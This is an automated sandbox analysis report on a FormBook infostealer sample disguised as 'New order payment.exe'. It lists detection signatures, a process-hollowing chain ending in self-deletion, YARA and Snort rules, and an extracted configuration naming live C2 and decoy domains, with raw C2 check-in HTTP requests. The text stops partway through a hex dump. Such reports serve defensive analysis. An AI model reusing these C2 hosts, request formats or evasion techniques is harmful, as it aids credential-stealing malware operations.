Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report New order payment.exe

Overview

General Information

Sample Name:New order payment.exe
Analysis ID:510241
MD5:0c301355b11c3bc570d18b02bb7c99d8
SHA1:b35295390555e6fc0b85d538dafbfb4cf8c68564
SHA256:77abd0b0f20b0ca86c241acf5d5d60188362e75213f894b7bea82c8f75a3c1b1
Tags:exeformbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • New order payment.exe (PID: 4912 cmdline: 'C:\Users\user\Desktop\New order payment.exe' MD5: 0C301355B11C3BC570D18B02BB7C99D8)
    • New order payment.exe (PID: 2372 cmdline: 'C:\Users\user\Desktop\New order payment.exe' MD5: 0C301355B11C3BC570D18B02BB7C99D8)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 2600 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 6196 cmdline: /c del 'C:\Users\user\Desktop\New order payment.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.New order payment.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.New order payment.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.New order payment.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        1.0.New order payment.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.0.New order payment.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspect Svchost ActivityShow sources
          Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2600
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2600
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2600

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://www.sejiw3.xyz/u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4nAvira URL Cloud: Label: phishing
          Machine Learning detection for sampleShow sources
          Source: New order payment.exeJoe Sandbox ML: detected
          Source: 1.0.New order payment.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.New order payment.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.2.New order payment.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.New order payment.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.New order payment.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.2.svchost.exe.3015000.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.New order payment.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.1.New order payment.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.New order payment.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.New order payment.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.2.svchost.exe.3d3796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.New order payment.exe.f020000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: New order payment.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: New order payment.exe, 00000000.00000003.242757682.000000000F1F0000.00000004.00000001.sdmp, New order payment.exe, 00000001.00000003.244051355.0000000000630000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New order payment.exe, svchost.exe
          Source: Binary string: svchost.pdb source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
          Source: Binary string: svchost.pdbUGP source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 4x nop then pop ebx1_2_00406AB4
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 4x nop then pop ebx1_1_00406AB4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx14_2_02D96AB5

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 51.210.240.92:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 51.210.240.92:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 51.210.240.92:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49791 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49791 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49791 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 35.241.55.103:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 35.241.55.103:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 35.241.55.103:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49800 -> 52.210.179.84:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49800 -> 52.210.179.84:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49800 -> 52.210.179.84:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.hanansalman.com
          Source: C:\Windows\explorer.exeDomain query: www.sejiw3.xyz
          Source: C:\Windows\explorer.exeDomain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exeNetwork Connect: 137.184.31.35 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.srchwithus.online
          Source: C:\Windows\explorer.exeDomain query: www.heyunshangcheng.info
          Source: C:\Windows\explorer.exeNetwork Connect: 51.210.240.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.134 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.67.234.155 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.241.55.103 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.christinegagnonjewellery.com
          Source: C:\Windows\explorer.exeDomain query: www.mykombuchafactory.com
          Source: C:\Windows\explorer.exeDomain query: www.itskosi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.salvationshippingsecurity.com
          Source: C:\Windows\explorer.exeDomain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exeDomain query: www.umgaleloacademy.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.sejiw3.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.crisisinterventionadvocates.com/u9xn/
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: PANDGUS PANDGUS
          Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n HTTP/1.1Host: www.salvationshippingsecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=RrR08BH4oIo+gx361vOF46QRRg434M3aJQMobyGncW6ZpM1n/iVBy8ajhiKV3UdnqaZn&5j=0BKPgh7X4n HTTP/1.1Host: www.heyunshangcheng.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&5j=0BKPgh7X4n HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n HTTP/1.1Host: www.srchwithus.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4n HTTP/1.1Host: www.sejiw3.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=FQ+FDzcRNFqTHDas5QzX/ZxEACq3iyWpSRLff56TNweY9Uo4XxUeKhcbnwpchSkctfqz&5j=0BKPgh7X4n HTTP/1.1Host: www.hanansalman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 14:20:27 GMTContent-Type: text/htmlContent-Length: 275ETag: "61704c6b-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 27 Oct 2021 14:20:38 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 